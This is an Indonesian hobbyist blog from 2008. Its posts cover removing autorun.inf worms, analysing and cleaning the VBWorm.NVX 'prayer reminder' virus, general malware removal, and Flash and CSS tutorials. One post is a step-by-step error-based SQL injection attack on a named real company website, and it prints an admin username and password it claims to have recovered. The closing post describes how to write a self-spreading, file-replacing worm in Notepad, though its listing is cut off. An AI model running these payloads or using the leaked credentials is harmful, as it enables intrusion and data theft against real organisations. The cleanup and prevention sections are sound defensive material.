Thursday, December 11, 2008

Non-Aktivkan Jantung Virus Worm (Autorun.inf)

Oleh : sinax89

Hi…!!! Friend kali ini saya mau jelasin….tentang VIRUS WORM. Bila komputer anda terserang virus sejenis WORM ( yang anda terima melalui EMAIL atau INTERNET), virus ini akan segera menyebar kembali dengan cara mengirim EMAIL ke semua alamat yang ada pada ADDRESS BOOK anda dan jika virus worm tersebut sudah masuk kedalam tempat penyimpanan data Anda spt : Fladisk, Hardisk dll.. maka virus ini akan menyebar atau membelah seperti cacing. Kemudian pengaruh jika komputer terinfeksi pada virus ini bisanya adalah :



Data Anda yang ada pada drive C terutama data yang berektensi doc akan berubah menjadi EXE. Ini dikarenakan virus worm akan meng-hidden atau menyembunyikan data aslinya dan kemudian membuat data palsu dengan nama file yang sama tetapi berekstensi EXE.

Regedit dan CMD akan diblok oleh virus, ini merupakan pertahanan sederhana yang harus dijaga jika virus ingin bertahan lama pada komputer yang terinfeksi.


Menghilangkan Folder Option, yang berfungsi untuk menjaga agar si user tidak dapat melihat dan menghapus komponen yang ada pada virus. 


Pengaruh dari virus worm di atas merupakan sebagian kecil dari kinerja virus worm. 


Jadi masalahnya adalah Gimana c caranya menonaktivkan atau mematikan jantung virus (Autorun.inf) terutama pada virus Worm yang berekstensi VBS agar virus tidak running pada drive kita ?? 


Emmm... pada seriiusss bacanya yaudah deeeh kita langsung aj.. Gimana cara membasmi autorun.inf jika ada pada suatu drive :


1. Langkah awal jika anda ingin melihat autorun.inf pada drive anda bisa melihatnya dengan cara : pada windows explore, klik toolsfolder Options – pilih tab View – pilih menu Show Hidden Files and Folders

Tetapi jika menu folder Options di blok anda juga bisa melihat dari CMD, dengan cara klik Start – pilih Run – ketik CMD – kemudian ketik drive yang anda mau contoh : jika anda mau pergi ke drive D maka anda ketik D: -  ketik attrib –a –s –h –r , maka file autorun.inf yang sudah di hidden akan dapat terlihat pada drive yang kita tentukan.


2. Setelah file Autorun.inf sudah terlihat maka langkah selanjutnya adalah Anda harus membuat sebuah mantra.... hehehe... (dukun kali) dengan ekstensi BAT. Dengan cara copy-paste coding di bawah ini kedalam NOTEPAD


del /a:r Drive:\autorun.inf
echo ‘virus sudah Di non Aktivkan’ 
> Drive:\autorun.inf&attrib +r Drive:\autorun.inf



Pada kata drive yang berwarna merah adalah tempat penyimpanan atau drive yang didalamnya terdapat file autorun.inf. misal : jika autorun.inf terdapat di drive C maka coding tersebut akan berubah menjadi :


del /a:r C:\autorun.inf
echo ‘virus sudah Di non Aktivkan’ 
> C:\autorun.inf&attrib +r C:\autorun.inf



3. Jika kita sudah menentukan drive dimana drive tersebut merupakan tempat jantung virus worm (autorun.inf) kemudian save as file tersebut dengan format : nama_file.bat, contoh : sinax89.bat dan tempatkan file ini, kedalam drive yang kita tentukan pada contoh di atas berarti pada drive C.

4. kemudian jalankan file tersebut misal pada contoh diatas sinax89.bat yang ada pada drive C. Insya Allah virus worm tersebut tidak akan berkutik lagi.... hehe..


Akhirnya selesai juga.... yaudah.... smoga tutorial ini bermanfaat bagi Anda yang membaca tutorial ini,  termakasih and SELAMAT MENCOBA !!!!




Friday, October 31, 2008

SQL Injection

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection 
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.


Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection 
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 
'T_ADMIN.NOMOR' is invalid in the select list because 
it is not contained in an aggregate function and 
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 
'T_ADMIN.NIP' is invalid in the select list because 
it is not contained in either an aggregate 
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 
'T_ADMIN.PASSWORD' is invalid in the select list because 
it is not contained in either an aggregate 
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL 
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR 
T_ADMIN.NIP 
T_ADMIN.PASSWORD 
T_ADMIN.NAMA 
T_ADMIN.KD_RANTING 
T_ADMIN.ADDRESS 
T_ADMIN.EMAIL 
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu 
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries 
in an SQL statement containing a UNION operator must have 
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum 
or average aggregate operation cannot take a char data 
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih 
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax 
error converting the varchar value 'bill ' to 
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where 
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax 
error converting the nvarchar value 'm@mpusk@u' to a 
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan 
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba 

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN 
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang 
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah 
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 
'tb_news.NewsId' is invalid in the select list because 
it is not contained in an aggregate function and 
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content => 
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review => 
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri 
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula 
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user 
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )

Thursday, October 30, 2008

Virus Shalat

Apakah Anda seorang Muslim ?

Apakah Anda sudah sholat ?



Di bulan Ramadhan ini, rupanya bukan hanya Acha & Irwansyah dan Ungu yang meluncurkan album berisi lagu-lagu religius baru. Pembuat virus juga tidak mau kalah meluncurkan virus yang “religius”. Lihat saja virus VBWorm.NVX yang setiap jam 13.00 (waktu Dzuhur) 16:00 (waktu Ashar), 18:30 (waktu Maghrib), 20:00 (waktu Isya) dan 5:30 (waktu Subuh) menampilkan pesan “Sudahkan Anda Shalat ?”. Hmm, mungkin lebih baik tidak membuat dan menyebarkan virus ya..... 


Bagaimana dengan kehidupan para Hacker/Cracker dan pembuat virus khususnya virus lokal dalam meyikapi bulan puasa ini? Ternyata masuknya bulan puasa tidak berarti menyurutkan para VM untuk tetap berkreasi walaupun dalam konteks yang berbeda. Jika sudah berada didepan komputer dan mulai menulis sederetan kode mereka sudah tidak memikirkan dampak yang akan ditimbulkan bagi para pengguna komputer, singkat kata Puasa jalan coding juga jalan J, walaupun ada sebagian sang VM yang membuat virus demi untuk kebaikan dan mengajak kejalan kebenaran tetapi jumlahnya sangat sedikit seperti yang dilakukan oleh VBWorm.NVX begitulah Norman Virus Control (lihat gambar 1) memberikan nama untuk virus ini, tetapi justru sangat menggangu bagi sebagian orang yang tidak menghendaki kedatangan VBWorm.MVX ini.


 



Gambar 1, Norman mendeteksi virus pengingat Shalat sebagai VBWorm.NVX


Secara umum VBWorm.MVX tidak lah ganas, selain tidak membuat file duplikat, menyembunyikan file / folder juga tidak sampai melakukan blok terhadap fungsi Windows atau tools security. Tujuannya hanya bersisi seruan untuk melakukan ibadah Sholat seperti yang banyak dilakukan oleh virus Macro. Untuk menyebarkan dirinya VBWorm.MVX masih menggunakan Flash Disk dengan membuat file Explorer.exe dengan ukuran 56 KB.

 
Icon yang digunakan oleh VBWorm.MVX adalah Microsoft Windows Explorer dengan ukuran file sebesar 56 KB (sedangkan file aslinya berukuran 1 KB). File ini mempunyai ekstensi EXE dengan type file sebagai “Application”. Dengan type file yang menyerupai Windows Explorer maka dapat dipastikan akan banyak user yang terjebak untuk menjalankan file tersebut, apalagi saat menjalankan file tersebut akan terbuka jendela My Documents layaknya menjalankan Windows Explorer. (lihat gambar 2)


 


Gambar 2 File induk VBWorm.NVX

Untuk memastikan agar dirinya dapat langsung aktif setiap kali komputer dijalankan, ia akan membuat beberapa file induk yang akan di jalankan setiap kali komputer dinyalakan, diantaranya:
C:\explorer.exe (file ini akan dibuat disetiap drive)
C:\WINDOWS\windowsapp.exe
C:\Documents and Settings\virus\My Documents\explorer.exe
C:\Windows\Yoosa.a

 

Sebagai penunjang agar file tersebut dapat dijalankan, VBWorm.NVX akan membuat beberapa string pada registry berikut:

o HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\4LLI

o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\ CurrentControlSet\Services\4LLI

o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\ CurrentControlSet\Services\4LLI

o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ CurrentControlSet\Services\4LLI

o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

§ windowsapp = C:\WINDOWS\windowsapp.exe

 

VBWorm.MXV ini tergolong masih baik karena tidak sampai melakukan blok terhadap fungsi Windows atau tools security, VBWorm.MVX juga tidak akan menyembunyikan file / dokumen dan tidak akan membuat file duplikat seperti yang dilakukan oleh virus lokal pada umumnya.

 

Misi tersembunyi VBWorm.MVX.

Apakah Anda seorang Muslim ?

Apakah Anda sudah sholat ?

 

Itu adalah sederetan pesan yang akan disuguhkan oleh VBWorm.MVX yang akan ditampilkan setiap waktu sholat tiba. Inilah yang menjadi Misi VBWorm.MVX yang mencoba untuk mengingatkan khususnya kaum muslim untuk senantiasa menjalankan sholat. Pesan ini muncul setiap pukul 13.00 (waktu Dzuhur) 16:00 (waktu Ashar), 18:30 (waktu Maghrib), 20:00 (waktu Isya) dan 5:30 (waktu Subuh). Untuk lebih jelasnya silahkan perhatikan gambar 3, 4 dan 5 berikut:
 




Gambar 3



Jika Anda pilih tombol “Ya” maka akan muncul pesan berikut (gambar 4) tetapi jika memilih tombol “Bukan” maka tidak akan terjadi reaksi apa-apa.


 


Gambar 4


Jika Anda memilih tombol “Sudah” maka akan muncul layar konfirmasi berikut (gambar 5), tetapi jika Anda memilih tombol “Belum”, maka komputer secara otomatis akan shutdown (mati).





Gambar 5

 

Mengatasi VBWotm.MVX secara manual

 

1. Putuskan hubungan komputer yang akan dibersihkan dari jaringan

2. Disable “System Restore” selama proses pembersihan berlangsung

3. Matikan proses virus yang aktif dimemori. Untuk mematikan proses virus ini Anda dapat     menggunakan tools Proceexp kemudian matikan proses dengan nama Windowsapp.exe yang mempunyai icon Microsoft Windows Explorer, perhatikan gambar 6 dibawah ini.

 



Gambar 6, Mematikan proses virus VBWorm.MVX di memori


 
4. Hapus file induk yang dibuat oleh Virus. Sebelum menghapus file duplikat tersebut pastikan Anda sudah menampilkan semua file / folder yang disembunyikan kemudian hapus file yang mempunyai ciri-ciri berikut:

 
Menggunakan icon Windows Explorer
Ukuran 56 KB
Ekstensi EXE
Type file Application

 

Berikut contoh file yang akan dibuat oleh VBWorm.MVX

o C:\explorer.exe (file ini akan dibuat disetiap drive)

o C:\WINDOWS\windowsapp.exe

o C:\Documents and Settings\%user% \My Documents\explorer.exe

o C:\Windows\Yoosa.a

 
5. Hapus string registry yang dibuat oleh virus. Untuk mempercepat proses penghapusan silahkan copy script dibawah ini pada program notepad kemudian simpan dengan nama repair.inf. Jalankan file tersebut dengan cara:

 
Klik kanan repair.inf
Klik install

 

[Version]

Signature="$Chicago$"

Provider=Vaksincom Oye

 

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

 

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"

 

[del]

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, windowsapp

HKLM, SYSTEM\CurrentControlSet\Services\4LLI

HKLM, SYSTEM\ControlSet001\Services\4LLI

HKLM, SYSTEM\ControlSet002\Services\4LLI

HKLM, SYSTEM\ControlSet003\Services\4LLI

 

6. Untuk pembersihan optimal dan mencegah infeksi ulang sebaiknya scan dengan Norman Virus Control yang up-to-date dan sudah dapat mengenali virus ini dengan baik.

7. Jika komputer sudah benar-benar bersih, aktifkan (enable) kembali “System Restore”

Menghancurkan Virus Trojan

Threads ini ditujukan untuk membasmi virus-virus baru dan virus Indo yang tidak terdeteksi oleh antivirus yang dipakai pada komputer. Dan juga buat yang bete kalau harus scan komputer cari virus berjam-jam padahal dengan cara ini paling 10 menit beres. Semoga bisa berguna dan bermanfaat.


Bagi netter yang komputernya suka terkena virus, mungkin panduan berikut di bawah ini bisa berguna. Secara teori cara ini bisa membunuh 90% yang beredar, hanya virus macro (word, excel) dan virus yang merusak file (extension EXE) yang susah dibersihkan dengan cara ini, walau bisa dicegah penularannya.


Membasmi Virus Dengan Command Windows

Bila netter merasakan komputer terkena virus, trojan dan spyware (dalam hal ini kita kategorikan semuanya sebagai virus aja), yang biasanya dengan indikasi ada tampilan yang tidak biasanya pada desktop, program yang digunakan dan browser. Sebaiknya langsung menempuh langkah berikut ini:
1. Tahap Pertama, Matikan Virus di Memori

Tekan Ctrl + Alt + Del untuk menampilan Windows Task Manager - Lalu ke bagian "Processes", terus klik bagian "User Name" untuk mengurutkan file yang diproses pada memori. Setelah itu, lihat ada bagian yang mencurigakan atau tidak. Bila banyak yang di-loading pada memori, sebaiknya dimatikan dahulu startup yang otomatis ter-loading pada bagian bawah kanan (ikon speaker dan jam). Matikan semua ikon-ikon tersebut dengan cara "quit" atau "exit" dari programnya.

Loading virus ke memori biasanya berupa EXE file. Langkah ini untuk mencegah virus untuk menyebar terlebih dahulu lewat memori kita. Matikan semua file EXE yang loading di memori kita yang sudah kita urutkan sebelumnya berdasarkan "User Name". Jangan mematikan file yang kategori "System", "Local Service", dan "Network Service", karena bisa membuat sistem kita Hang atau Freeze.

2. Tahap Kedua, Non-aktifkan Virus di Startup
Untuk menon-aktifkan virus supaya tidak terloading ke memori, kita harus membuangnya di startup. Caranya kita bisa menggunakan perintah MSCONFIG, klik menu Start>Run>msconfig - setelah itu akan tampil "System Configuration Utility". Lalu pilihlah "Startup", dalam kasus ini sebaiknya netter yang tidak mengerti mana yang loading virus mana yang bukan, sebaiknya pilih "Disable All". Nantinya netter baru aktifkan kembali startup yang diinginkan kalau virus sudah bersih.

Bila netter yang mengerti file yang loading mana file yang diperlukan, dan mana yang tidak, atau mana yang virus atau bukan, sebaiknya menbuang conteng (check box) pada kotak bagian kiri untuk yang dicurigai sebagai virus. Cara ini akan menonaktifkan virus di startup kita.

3. Tahap Ketiga, Hapus File Virus dari Komputer
Carilah dengan menggunakan fasilitas "search" pada WIndows, klik menu Start>Search, lalu carilah file EXE virus (contoh: Happy.exe) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari WIndows. Setelah ditemukan, delete atau hapus file tersebut.

4. Tahap Keempat, Hapus Virus dari System Registry
Tahap ini adalah tahap terakhir. Kita harus menggunakan perintah REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah Start>Run>regedit - lalu ke menu "Edit" pilihlah "Find" (atau tekan Ctrl+F). Masukkan nama file virus yang ingin kita hapus (contoh: Happy.exe), lalu pilih "Find Next". Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut (berikut dengan foldernya kalau ada).

Kemudian lanjutkan dengan menekan tombol "F3" atau di menu pilih "Edit" terus "Find Next". Biasanya file virus diletakkan pada beberapa tempat di registry. Jadi pastikan netter menghapus semuanya sampai bersih, dalam arti registry komputer bebas dari loading virus tersebut. Karena kalau tidak pekerjaan ini akan sia-sia.
Membasmi Virus Dengan Bantuan Program Lain

Ada beberapa tools yang sangat berguna bagi netter untuk mempermudah pembasmian virus, antara lain:

CProcess - Tools ini fungsinya seperti "Windows Task Manager" (Ctrl + Alt +Del). Tools ini sangat bagus sekali untuk mengenali mana yang virus atau bukan karena mengandung informasi detil mengenai file yang terloading di memori. Seperti contoh file yang benar (bukan virus) selalu tertulis nama perusahaan pembuatnya (contoh: Windows buatan Microsoft Corp).

Hijack This - Tools yang sangat bagus sekali sebagai pengganti command MSCONFIG. Sering kali virus mematikan hak akses kita terhadap MSCONFIG supaya kita tidak bisa menghapus file virus yang ter-loading ketika Startup. Nah program ini berfungsi untuk menggantikan MSCONFIG yang tidak bisa aktif. Selain itu program ini bisa mendeteksi lebih mendetil seperti spyware yang inject di dalam browser kita (BHO), dan bisa menonaktifkannya..

CCleaner - Tools yang satu ini selain berguna untuk menggantikan command REGEDIT, juga bisa membersihkan virus di registry secara otomatis. Selain itu CCleaner juga bisa mempercepat akses Windows kamu dengan membersihkan semua sampah-sampah di dalam registry kamu.

PCMAV - Program antivirus buatan PC Media ini terbukti sangat ampuh untuk menghapus virus-virus Indo yang kadang-kadang suka rese.

AVG 8 Free Edition - Program antivirus gratis yang sangat powerful untuk mengatasi virus dari luar negeri.

Sunday, October 19, 2008

Download Software

A) Bahasa Pemrograman





  • COBOL



B) Chat



C) Gemes



D) Sofware Pendukung



  1. Flash Player Download Now

Thursday, October 16, 2008

Tutorial Flash

Kami ada beberapa Tutorial
Flash
berbahasa indonesia, diantaranya:

Tutorial
Photoshop:

- Membuat
3D Background Abstrak
- tutorial bagaimana cara membuat Background Abstrak
3D
- Membuat
Effect Bias Pelangi
- anda ingin tahu bagai mana cara membuat effect
bias?



- AdobePhotoshop
CS Portable
- ini bagi teman2 yang ingin mempunyai photoshop secara portable
tanpa menginstall

Tutorial CorelDraw (Maaf kami baru
punya 2 tutorial)
- Membuat
Butiran Air
- baru!! coba lihat bagaimana kita dapat membuat sendiri gambar
butiran2 air yang meleleh
- Membuat
Bercak Noda dengan SmudgeBrush
- bagi anda yang ingin membuat bercak atau
cipratan noda, silahkan di lihat..
- CorelDraw
11 Portable Githu Loh ...
- ini juga versi portable coreldraw, jika ingin
jalankan coreldraw tanpa install.... silahkan di download

..::
Tutorial Flash ::..

- Tutorial
Flash menggunakan Masking
- tutorial beginner yang memberikan pengajaran
cara membuat masking
- Membuat
Navigasi Sederhana
- ini jika anda mau membuat navigasi dengan menggunakan
animasi flash
- Membuat
Digital Clock di Flash
- membuat jam digital dari flash?
- Membuat
Trail Mouse
- membuat trail mouse, boleh saja
- Macromedia
Flash 8 portable Pro
- ini juga versi portable flash, jika ingin jalankan
flash tanpa install.... silahkan di download

Kami akan mencoba untuk
terus menambah Tutorial
Flash

spesial dengan bahasa indonesia... tunggu saja :)

--// Terima
Artikel
Kami menerima submit Artikel Flash
Jika ada teman-teman yang jago
Flash dan ingin tutorialnya di publikasikan di sini, silahkan kirimkan artikel
mu dalam bentuk Microsoft Word ke : black.scorpio.night[at]gmail.com (Kami akan
cantumkan sumbernya)

Terimakasih

Membuat Flash Icon Animasi


Di pembahasan kali ini saya  akan membuat sebuah tampilan flash icon, apabila di dekatkan ke sebuah icon  kemudian icon tersebut akan memberikan aksi. Di sini kita menggunakan gambar  dan kemudian gambar tersebut kita buat movie. Anda dapat mengikuti step-step di  bawah ini, jangan anda lewatkan satu step saja karena akan mengalami kesalahan  dan hasil flashnya tidak berjalan.

Tutorial lebih lanjut silahkan download: http://unair.info/flash/flash-icon.zip

Fla download disini: http://www.unair.info/flash/membuat-flash-icon-animasi/flashicon.fla


Sumber dari situs Ilmu Website dalam kategori flash dengan judul Membuat Flash Icon Animasi

Membuat Box Style Link Cantik ala dr.emi dengan CS

Jimanee nDesign box link cantik dengan menggunakan CSS ?

Pernah liat page link nyang ada di :
    http://www.dremi.info/tutorial/photoshop-forum.php ???

nah bagian paging na gw pake CSS bwat bikin box link na, kali ini kita bikin nyang sama tapi dengan style CSS yang berbeda.


Simple aja mulai dengan style ke gini:

 

<style>
    #pagin a
    {
    font-family:Tahoma;
    font-size:11px;
    display:block;
    float:left;
    cursor:pointer;
    color:#00c;
    text-decoration:none;
    display:inline-block;
    border:1px solid #ccc;
    padding:.3em .7em;
    margin:0 .38em 0 0;
    text-align:center
    }
    #pagin a:hover
    {
    background:#f0f7e8;
    border:1px solid #83bc46
    }
    #pagin a.sel
    {
    color:#333;
    font-weight:normal;
    background:#f0f7e8;
    cursor: default;
    border:1px solid #83bc46
    }
    </style>

 

Tros terapkan ke dalam halaman HTML lu:

 

<div id="pagin">
    <a class="sel">1</a><a href="http://csslovers.co.cc">2</a>
    <a href="http://dremi468.blogspot.com">3</a>
    <a href="http://dremi.info/tutorial/photoshop-forum.php">4</a>
    </div>

heehe jadi dah, lagi lagi tutorial CSS na singket !!! biarin weks :P !!

Penasaran kan mao liat hasilna ?? klik ajah link dibawah ini, bwat preview hasilna:

http://www.dremi.info/web/tips/css-box-style-design.html

 

Tros kalo mao download disini:

http://www.ziddu.com/download/1774822/css-box-style-design.rar.html

 

Thanks, dr.emi


Saturday, October 4, 2008

Buat Virus dengan Notepad

Oleh : Sinax89


Bagi kamu semua yang mau belajar buat virus sederhana, kamu Cukup mengunakan notped sebagai wadah penulisan scrip virus. Virus ini tidak merusak system kerja komputer, hanya saja merepotkan pengguna komputer, he..he… namanya juga virus pasti ada effect nya doonk….

Sistem kerja virus ini adalah, … virus ini akan menduplikasikan dirinya ke dalam sebuah drive untuk dijadikan file induk, terutama pada drive C. misal C:\windows kemudian dengan dibuatnya autorun.inf, secara otomatis virus akan bergerak menyebar keseluruh drive yang ada pada komputer dan juga termasuk setiap flash disc yang tercolok pada komputer yang sudah terinfeksi. Setelah virus ini menyebar keseluruh drive, virus ini akan menghilangkan file yang ada pada drive terutama pada flash disc, virus akan mengganti file tersebut dengan dengan virus yang yang biasanya berbentuk folder dan mempunyai tipe data application. Bagaimana cara buat Virus tersebut? Mari kita liat listing program virus dibawah ini :



